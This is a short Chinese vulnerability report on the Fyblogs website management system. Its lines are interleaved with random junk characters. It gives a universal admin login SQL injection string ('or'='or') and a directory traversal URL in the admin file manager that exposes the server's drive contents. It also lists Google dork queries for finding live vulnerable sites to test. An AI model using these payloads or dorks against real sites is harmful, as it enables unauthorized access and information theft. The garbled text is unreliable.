漏洞类型: 未授权访问/权限绕过
+ ?, F# E! |$ b/ t# Z3 b) o
) p& I/ K7 I$ X, s6 ?$ i; d9 c/ Z简要描述:$ ~- W* a$ ?. k6 K& F9 W# p
& o% n: h8 g* C& d
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!9 g9 T' Q% E( i! _$ ?
- Q8 m8 G* j$ A. Q) ~8 D
详细说明:
+ T" p% F; S- a7 J" B2 F0 L! V: r& s. h0 H2 W/ P9 x1 n
后台万能密码 'or'='or'
+ \2 ]8 _! B- {; p2 r& l2 s后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
& B5 D- z/ J* j) e* j( aadmin/uploadfile.asp?currentFolder=/upfiles/../& l5 T9 m. Q$ _1 U( k8 i- b
8 Z! w2 {- o/ w" C5 }漏洞证明:
4 t4 ?( a& c0 q/ A) d" a$ K& z5 a5 s y* H4 E% l+ H
谷歌:inurl:type.asp?id=1 新闻中心
4 S% t) q, z0 H+ [8 n( q- I或者 :inurl:download_ok.asp?
! o% T, n3 v* k3 c6 s
: A+ z/ D5 c8 b# T" k5 h- J! B! h可以测试
# C; L9 m+ W4 t ~) A# g6 M; F/ m! [0 k! H; G3 c9 P
' A2 ^. ~+ k& W- i3 p+ r |